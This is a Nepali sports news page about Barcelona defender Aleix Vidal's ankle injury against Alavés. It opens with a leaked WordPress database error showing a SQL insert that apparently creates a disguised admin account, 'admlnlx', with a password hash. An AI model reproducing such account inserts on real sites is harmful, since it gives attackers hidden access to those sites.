WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiCW4fsD6Sgy9L8AzmcXDYUWhFH6Pw1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 05:28:29', '', 'admlnlx', 'admlnlx')
फागुन १ –
बार्सिलोनाका फुल–ब्याक एलेक्स भिडाल अबको पाँच महिना खेल्न नसक्ने भएका छन् । स्पेनिस ला लिगा अन्तर्गत शनिबार राति एलाभेससँगको खेलको क्रममा भिडालको दायाँ खुट्टाको गोलीगाँठोमा चोट लागेको हो । उनको जोर्नीटुटेको छ । खेलको ८५ औं मिनेटमा एलाभेसका थियो हर्नान्नडेजसँग ठोक्किएपछि उनको गोलीगाँठोमा चोट लागेको हो । त्यसपछि २७ वर्षका भिडाललाई स्ट्रेचरमा राखेर मैदान बाहिर लगिएको थियो ।
उनको चोट गम्भीर रहेको र यो सिजनका बाँकी खेल खेल्न नसक्ने जनाइएको छ । ओसासुनासँगको खेलमा बार्सिलोना ६ – ० ले बिजयी भयो ।